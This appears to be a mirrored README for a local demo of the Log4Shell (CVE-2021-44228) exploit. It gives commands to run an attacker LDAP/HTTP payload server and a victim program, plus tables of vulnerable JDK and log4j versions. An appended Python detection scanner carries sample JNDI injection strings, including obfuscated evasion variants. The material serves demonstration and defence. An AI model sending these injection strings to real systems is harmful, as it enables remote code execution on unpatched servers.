## https://sploitus.com/exploit?id=371D4A15-51B5-520B-B31D-856E557695FD
# sample-ldap-exploit

A short demo of CVE-2021-44228.

## Build

~~~
$ mvn clean verify
~~~

## Run Attacker

~~~
$ java \
  -cp 'attacker/target/sample-attacker.jar:attacker/target/lib/*' \
  sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080 payload/target/sample-payload.jar
~~~

URLs served by the attacker's HTTP server on port 8080:
- `http://localhost:8080/`
- `http://localhost:8080/sample/payload/Payload.class`

## Run Victim

~~~
$ java \
  -cp 'victim/target/sample-victim.jar:victim/target/lib/*' \
  sample.victim.Victim
~~~

## Results

### JDK / JRE

| Version                          | Status                                                                     |
|----------------------------------|----------------------------------------------------------------------------|
| `Oracle JDK 8u5`                 | vulnerable                                                                 |
| `OpenJDK 8u312`                  | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `IBM OpenJDK 8u312-b07 (OpenJ9)` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 11.0.7+10`              | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 11.0.13+8`              | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 16+36`                  | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 17+35`                  | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 17.0.1+12`              | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |

If NOT vulnerable, `javax.naming.Context.lookup()` returns a plain `javax.naming.Reference` instead of loading the class from the remote codebase.

Even if a JDK is NOT vulnerable to loading classes from remote codebases,
other **Java deserialization vulnerabilities probably still exist**!

### log4j

| Version  | Status                                                                                                            |
|----------|-------------------------------------------------------------------------------------------------------------------|
| `2.9.1`  | vulnerable                                                                                                        |
| `2.10.0` | vulnerable (unless `-Dlog4j2.formatMsgNoLookups=true` or environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`) |
| `2.14.1` | vulnerable (unless `-Dlog4j2.formatMsgNoLookups=true` or environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`) |
| `2.15.0` | NOT vulnerable                                                                                                    |

If NOT vulnerable, the `${jndi:ldap:...}` lookup in the logged message is NOT resolved.
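Whether or not a host had the mitigations above, the `${jndi:...}` lookup string still lands in its logs, which is what a defender searches for. The following is an added detection example (not part of this repository) run over constructed access-log lines; it also collapses the nested `${lower:...}` and `${...:-x}` lookups that Log4j evaluates before the outer one, so the same lookup is found whether or not it was spelled out literally. It assumes only a Python 3 interpreter; the hosts and log lines are made up.

```python
import re

# Innermost "${...}" token (no braces inside), matched before outer ones.
LOOKUP_RE = re.compile(r"\$\{([^{}]*)\}")
# A fully spelled-out JNDI lookup, e.g. ${jndi:ldap://host:1389/a}.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:[^}]*\}", re.IGNORECASE)


def collapse_nested_lookups(text: str) -> str:
    """Evaluate the nested lookups Log4j resolves before the outer ${jndi:...}:
    ${lower:X} -> x, ${upper:x} -> X, ${anything:-default} -> default.
    Unknown lookups are left untouched, so ${jndi:...} itself survives."""
    def repl(m):
        body = m.group(1)
        if ":-" in body:                      # default-value syntax
            return body.split(":-", 1)[1]
        prefix, _, arg = body.partition(":")
        if prefix.strip().lower() == "lower":
            return arg.lower()
        if prefix.strip().lower() == "upper":
            return arg.upper()
        return m.group(0)
    prev = None
    while prev != text:                       # repeat until nothing collapses
        prev, text = text, LOOKUP_RE.sub(repl, text)
    return text


def find_jndi_lookups(line: str) -> list:
    """Return every ${jndi:<scheme>:...} token in a line, obfuscated or not."""
    return [m.group(0) for m in JNDI_RE.finditer(collapse_nested_lookups(line))]


def scan_log(lines) -> list:
    """Return (line_number, token) pairs for every line carrying a JNDI lookup."""
    return [(n, tok) for n, line in enumerate(lines, 1) for tok in find_jndi_lookups(line)]


# Constructed sample access-log lines; the hosts and addresses are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://localhost:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:J}ndi:${lower:LDAP}://localhost:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://localhost:1099/a}"',
]

if __name__ == "__main__":
    for n, tok in scan_log(SAMPLE_LOG):
        print(f"line {n}: {tok}")
```

The scanner reports the normalized token, so lines 2, 3 and 4 of the sample all surface as the same `${jndi:ldap://...}` or `${jndi:rmi://...}` lookup.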